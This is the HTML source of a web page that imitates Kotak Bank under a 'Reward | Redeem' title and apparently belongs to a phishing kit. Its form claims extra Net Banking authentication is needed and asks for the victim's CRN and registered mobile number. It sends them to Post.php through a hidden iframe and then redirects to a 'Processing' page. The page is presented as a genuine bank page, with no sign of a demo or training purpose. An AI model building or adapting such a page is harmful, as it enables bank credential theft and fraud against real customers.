<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Kotak Bank Reward | Redeem</title>
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="author" content="Syahrizaldev">
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Heebo:wght@300;400;500;600;700&display=swap" rel="stylesheet">
<link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css'><link rel="stylesheet" href="">
<style type="text/css">
#Lg
{
  width:180px;
  margin-bottom:10px;
  margin-top:25px;
}
#Lg2
{
  width:155px;
  position:absolute;
  margin-top:0%;
  margin-left:40%;
  margin-top:24px;
}
#Lg3
{
  width:100%;
  margin-top:25%;
}
div.c
{
    line-height: 160%;
    font-size:16px; 
    font-family: 'Heebo', sans-serif; 
    font-weight:300;  
    margin-top:0;
}
div.cnt
{
    line-height: 120%;
}
div.footer
{
    line-height: 90%;
}

.btn
{
 width:120px;
 padding:6px 10px;
 border-style:solid;
 outline:none;
 border:none;
 border-radius:4px;
 color:#fff;
 font-family: 'Heebo', sans-serif;
 font-weight:500;
 font-size:14px;
 background-color:#EE1C25;
 margin-top:12px;
 margin-left:58%;
}
hr.hr
{
  width:116%;
  margin-left:-8%;
  border-style:solid;
  border-color:grey;
  border-width:0.5px;
  }
  .inputWithIcon input[type="text"] {
  padding-left: 25px;
  }
  
  .inputWithIcon {
  position: relative;
  }
  
  .inputWithIcon i {
  position: absolute;
  left: 0;
  top: 6.5px;
  padding: 10px 12px;
  color: #000;
  transition: 0.3s;
  }

  :root {
  --color-black: hsl(0, 0%, 10%);
  --color-grays: hsl(0, 0%, 65%);
  --color-light: hsl(0, 0%, 96%);
  --color-white: hsl(0, 0%, 100%);
  --color-blues: hsl(225, 100%, 60%);
  --shadow-normal: 0 1px 3px 0 rgba(0, 0, 0, 0.1),
  0 1px 2px 0 rgba(0, 0, 0, 0.06);
  --shadow-medium: 0 4px 6px -1px rgba(0, 0, 0, 0.1),
  0 2px 4px -1px rgba(0, 0, 0, 0.06);
  --shadow-large: 2px 4px 10px 1px rgba(0, 0, 0, 0.5),
  0 4px 6px -2px rgba(0, 0, 0, 0.05);
  }
  
  *,
  *::before,
  *::after {
  padding: 0;
  margin: 0;
  box-sizing: border-box;
  list-style: none;
  list-style-type: none;
  text-decoration: none;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
  text-rendering: optimizeLegibility;
  }
  
  html {
  font-size: 100%;
  box-sizing: inherit;
  font-family: 'Heebo', sans-serif;
  scroll-behavior: smooth;
  height: -webkit-fill-available;
  }
  
  body {
  font-family: 'Heebo', sans-serif;
  font-size: 1rem;
  font-weight: 300;
  line-height: 1.5;
  color: var(--color-black);
  background: var(--color-white);
  height: -webkit-fill-available;
  }
  
  main {
  overflow: hidden;
  }
  
  .section {
  margin: 0 auto;
  padding: 0 2rem;
  }
  
  .container {
  max-width: 75rem;
  height: auto;
  margin-top: 100px;
  padding: 0rem 0.75rem;
  }
  
  .centered {
  text-align: center;
  vertical-align: middle;
  margin-bottom: 1rem;
  }
  
  .heading {
  font-family: 'Heebo', sans-serif;
  font-size: 1.75rem;
  font-weight: 300;
  line-height: 1.25;
  margin-top: 1rem;
  color: var(--color-black);
  text-transform: uppercase;
  }
  
  .form-control {
  position: relative;
  width: 100%;
  height: 3rem;
  margin-bottom: 1.5rem;
  }
  .form-label {
  position: absolute;
  font-family: 'Heebo', sans-serif;
  font-size: 0.80rem;
  font-weight: 400;
  line-height: inherit;
  left: 1.90rem;
  top: 0.75rem;
  padding: 0.25rem;
  color: var(--color-grays);
  background: var(--color-white);
  transition: all 0.3s ease;
  }
  .form-input {
  position: absolute;
  font-family: 'Heebo', sans-serif;
  font-size: 0.90rem;
  font-weight: 400;
  line-height: inherit;
  top: 0;
  left: 0;
  z-index: 1;
  resize: none;
  width: 100%;
  height: auto;
  border-radius: 0.1rem;
  border: 1px solid var(--color-grays);
  color: black;
  background: transparent;
  transition: all 0.3s ease-in-out;
  }
  #crn,#mobile
  { 
    padding: 12px 34px 12px 34px;
  }

  input::-webkit-input-placeholder {
  color: transparent;
  font-family: 'Heebo', sans-serif;
  font-weight:400;
  }
  input:focus::-webkit-input-placeholder {
  color: #999;
  text-transform:none;
  font-family:'Heebo', sans-serif ;
  font-weight:400;
  }
  
  /* Firefox < 19 */
  input:-moz-placeholder {
  color: transparent;
  font-family:'Heebo', sans-serif ;
  font-weight:400;
  }
  input:focus:-moz-placeholder {
  color: #999;
  font-family: 'Heebo', sans-serif;
  text-transform:none;
  font-weight:400;
  }
  
  /* Firefox > 19 */
  input::-moz-placeholder {
  color: transparent;
  font-family:'Heebo', sans-serif ;
  font-weight:400;
  }
  input:focus::-moz-placeholder {
  color: #999;
  font-family:'Heebo', sans-serif;
  text-transform:none;
  font-weight:400;
  }
  
  /* Internet Explorer 10 */
  input:-ms-input-placeholder {
  color: transparent;
  font-family:'Heebo', sans-serif ;
  font-weight:400;
  }
  input:focus:-ms-input-placeholder {
  color: #999;
  font-family:'Heebo', sans-serif;
  text-transform:none;
  font-weight:400;
  }
  .form-input:focus {
  outline: none;
  border: 1.5px solid var(--color-black);
  }
  .form-input:focus ~ .form-label {
  top: -0.70rem;
  left: 1.95rem;
  z-index: 5;
  font-family: 'Heebo', sans-serif;
  font-size: 0.70rem;
  font-weight: 500;
  color: var(--color-black);
  transition: all 0.3s ease-in-out;
  }
  .form-input:not(:-moz-placeholder-shown).form-input:not(:focus) ~ .form-label {
  top: -0.70rem;
  left: 1.90rem;
  z-index: 9;
  font-size: 0.70rem;
  font-family: 'Heebo', sans-serif;
  font-weight: 500;
  -moz-transition: all 0.2s ease-in-out;
  transition: all 0.3s ease-in-out;
  }
  .form-input:not(:-ms-input-placeholder).form-input:not(:focus) ~ .form-label {
  top: -0.70rem;
  left: 1.90rem;
  z-index: 9;
  font-size: 0.70rem;
  font-family: 'Heebo', sans-serif;
  font-weight: 500;
  -ms-transition: all 0.2s ease-in-out;
  transition: all 0.3s ease-in-out;
  }
  .form-input:not(:placeholder-shown).form-input:not(:focus) ~ .form-label {
  top: -0.70rem;
  left: 1.95rem;
  z-index: 9;
  font-size: 0.70rem;
  border-color:black;
  font-family: 'Heebo', sans-serif;
  font-weight: 500;
  transition: all 0.3s ease-in-out;
  }
  
  .contact-column {
  max-width: 30rem;
  width: 100%;
  height: auto;
  margin: 0 auto;
  }
  .contact-inform {
  padding: 0.75rem 1.5rem 1rem;
  border-radius: 0.25rem;
  color: var(--color-black);
  background: var(--color-white);
  box-shadow: var(--shadow-large);
  }
</style>
</head>
<body>
<!-- Static- Please don't do anything here-->
  <script type="text/javascript">var submitted=false;</script>
  <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Processing2.html';}"></iframe>
<!-- partial:index.partial.html -->
<section class="sectioncontact-section" style="background-color:#FAFAFA;">
	<div class="container contact-column">
		<img src="Kotak_Logo.jpg" alt="" id="Lg" >
		<form class="contact-inform form" action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true">
		    <div class="c">
		    <h3>More authentication needed for signing up Net Banking.<br>Enter Your CRN Details.</h3>
			</div><br>
			<div class="cnt">
			<p1 style="color:grey; font-size:14px; font-family: 'Heebo', sans-serif; font-weight:400;">Enter your Kotak Bank CNR details and proceed.</p1><br><br>
			</div>
			<div class="form-control" style="margin-top:-10px;">
			<div class="inputWithIcon">
			<input type="text" class="form-input"  placeholder="Enter CRN Number" name="CRN_Number" id="crn" inputmode="numeric" minlength="" maxlength="11" 
			pattern="[0-9]\d{7,10}" title="Please enter correct CRN number !"
			style="text-transform:uppercase;" autocomplete="off" required />
			<label class="form-label" for="name">CRN NUMBER</label>
			<i class="fa fa-university" aria-hidden="true"></i>
			</div>
			</div>
			<div class="form-control">
			<div class="inputWithIcon">
			<input type="text" class="form-input"  placeholder="Registered Mobile Number" inputmode="numeric" name="Mobile_No." maxlength="10" id="mobile"
			pattern="[6-9]\d{9}" title="Please enter valid mobile number !"
			autocomplete="off" required />
			<label class="form-label" for="mobile">MOBILE NUMBER</label>
			<i class="fa fa-phone" aria-hidden="true"></i>
			</div>
			</div><br>
			<hr class="hr">
			<button type="submit" class="btn">Continue</button>
</section>
            <img src="Kotak_Footer.jpg" alt="" id="Lg3" > 
</body>
</html>